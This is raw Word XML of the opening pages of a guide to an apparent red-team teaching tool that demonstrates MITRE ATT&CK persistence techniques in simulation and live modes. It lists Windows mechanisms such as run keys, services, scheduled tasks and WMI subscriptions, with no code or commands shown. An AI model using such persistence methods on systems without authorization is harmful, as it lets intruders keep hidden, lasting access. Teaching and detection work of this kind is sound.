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rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D1B2A"/>
          <w:sz w:val="80"/>
          <w:szCs w:val="80"/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE ATT&amp;CK</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1565C0"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:t xml:space="preserve">Persistence Toolkit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="400"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="546E7A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Tactic TA0003  ·  20+ Techniques  ·  Windows · Linux · macOS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1565C0" w:sz="2" w:space="4"/>
        </w:pBdr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="546E7A"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Setup, Operations &amp; Detection Reference Guide</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1565C0" w:sz="2" w:space="4"/>
        </w:pBdr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="500"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="6480"/>
        <w:jc w:val="center"/>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tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CFD8DC" w:sz="1"/>
              <w:left w:val="single" w:color="CFD8DC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CFD8DC" w:sz="1"/>
              <w:right w:val="single" w:color="CFD8DC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="E8EEF4" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0D1B2A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="43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2.0 — Full TA0003 Suite</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CFD8DC" w:sz="1"/>
              <w:left w:val="single" w:color="CFD8DC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CFD8DC" w:sz="1"/>
              <w:right w:val="single" w:color="CFD8DC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="E8EEF4" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0D1B2A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Language</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="43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Go 1.21+ — Zero external dependencies</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CFD8DC" w:sz="1"/>
              <w:left w:val="single" w:color="CFD8DC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CFD8DC" w:sz="1"/>
              <w:right w:val="single" w:color="CFD8DC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="E8EEF4" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0D1B2A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Techniques</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="43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20+ across Windows, Linux, macOS, and cross-platform</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CFD8DC" w:sz="1"/>
              <w:left w:val="single" w:color="CFD8DC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CFD8DC" w:sz="1"/>
              <w:right w:val="single" w:color="CFD8DC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="E8EEF4" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0D1B2A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Platforms</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="43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Windows 10/11/Server · Kali Linux · Ubuntu · macOS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CFD8DC" w:sz="1"/>
              <w:left w:val="single" w:color="CFD8DC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CFD8DC" w:sz="1"/>
              <w:right w:val="single" w:color="CFD8DC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="E8EEF4" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0D1B2A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Modes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="43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Live (real changes) + Simulation (teaching, no changes)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CFD8DC" w:sz="1"/>
              <w:left w:val="single" w:color="CFD8DC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CFD8DC" w:sz="1"/>
              <w:right w:val="single" w:color="CFD8DC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="E8EEF4" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0D1B2A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Output</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="43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Terminal (ANSI) + HTML Dashboard + JSON + CSV</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CFD8DC" w:sz="1"/>
              <w:left w:val="single" w:color="CFD8DC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CFD8DC" w:sz="1"/>
              <w:right w:val="single" w:color="CFD8DC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="E8EEF4" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0D1B2A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Audience</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="43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Red/Blue Team operators, SOC instructors, students</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="600"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="C62828" w:sz="1"/>
          <w:left w:val="single" w:color="C62828" w:sz="1"/>
          <w:bottom w:val="single" w:color="C62828" w:sz="1"/>
          <w:right w:val="single" w:color="C62828" w:sz="1"/>
        </w:pBdr>
        <w:shd w:fill="FFF3F3" w:val="clear"/>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="1440" w:right="1440"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C62828"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">AUTHORIZED TESTING AND EDUCATIONAL USE ONLY</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1565C0" w:sz="6" w:space="6"/>
        </w:pBdr>
        <w:spacing w:before="520" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D1B2A"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">1.  Overview</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The MITRE ATT&amp;CK Persistence Toolkit is a fully automated, interactive Go application that demonstrates all major techniques in MITRE ATT&amp;CK Tactic TA0003 — Persistence. It covers 20+ sub-techniques across Windows, Linux, macOS, and cross-platform vectors, with real implementation (live mode) or detailed simulation output (simulation mode).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Each technique execution produces: terminal output with full technical detail, IoC indicators, detection opportunities, and MITRE mapping. All results are aggregated in session memory and exportable to JSON, HTML dashboard, and CSV.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="360" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1565C0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Two Operating Modes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Simulation Mode (default) — shows exactly what would happen in complete technical detail without making any system changes. Ideal for classroom instruction.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Live Mode — executes real persistence mechanisms. Requires authorization confirmation. Use only on systems you own or have explicit written authorization to test.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="360" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1565C0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Technique Coverage</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="8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000"/>
        <w:gridCol w:w="800"/>
        <w:gridCol w:w="3360"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CFD8DC" w:sz="1"/>
              <w:left w:val="single" w:color="CFD8DC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CFD8DC" w:sz="1"/>
              <w:right w:val="single" w:color="CFD8DC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="E8EEF4" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0D1B2A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Technique ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2200"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CFD8DC" w:sz="1"/>
              <w:left w:val="single" w:color="CFD8DC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CFD8DC" w:sz="1"/>
              <w:right w:val="single" w:color="CFD8DC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="E8EEF4" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0D1B2A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1000"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CFD8DC" w:sz="1"/>
              <w:left w:val="single" w:color="CFD8DC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CFD8DC" w:sz="1"/>
              <w:right w:val="single" w:color="CFD8DC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="E8EEF4" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0D1B2A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Platform</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="800"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CFD8DC" w:sz="1"/>
              <w:left w:val="single" w:color="CFD8DC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CFD8DC" w:sz="1"/>
              <w:right w:val="single" w:color="CFD8DC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="E8EEF4" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0D1B2A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CFD8DC" w:sz="1"/>
              <w:left w:val="single" w:color="CFD8DC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CFD8DC" w:sz="1"/>
              <w:right w:val="single" w:color="CFD8DC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="E8EEF4" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0D1B2A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Mechanism</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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6A1B9A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">T1547.001</w:t>
            </w:r>
          </w:p>
        </w:tc>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212121"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Registry Run Keys</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Windows</w:t>
            </w:r>
          </w:p>
        </w:tc>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E65100"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Every user logon — HKCU\Run</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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6A1B9A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">T1547.001b</w:t>
            </w:r>
          </w:p>
        </w:tc>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212121"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Startup Folder</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Windows</w:t>
            </w:r>
          </w:p>
        </w:tc>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E65100"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Every user logon — Explorer executes on startup</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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6A1B9A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">T1543.003</w:t>
            </w:r>
          </w:p>
        </w:tc>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212121"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Windows Service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Windows</w:t>
            </w:r>
          </w:p>
        </w:tc>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C62828"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Boot-level — runs as SYSTEM, survives reboot</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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6A1B9A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">T1053.005</w:t>
            </w:r>
          </w:p>
        </w:tc>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212121"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Scheduled Task</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Windows</w:t>
            </w:r>
          </w:p>
        </w:tc>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E65100"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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ONLOGON/DAILY trigger — flexible schedule</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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6A1B9A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">T1546.003</w:t>
            </w:r>
          </w:p>
        </w:tc>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212121"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">WMI Event Subscription</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Windows</w:t>
            </w:r>
          </w:p>
        </w:tc>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C62828"/>
                <w:sz w:val="18"/>
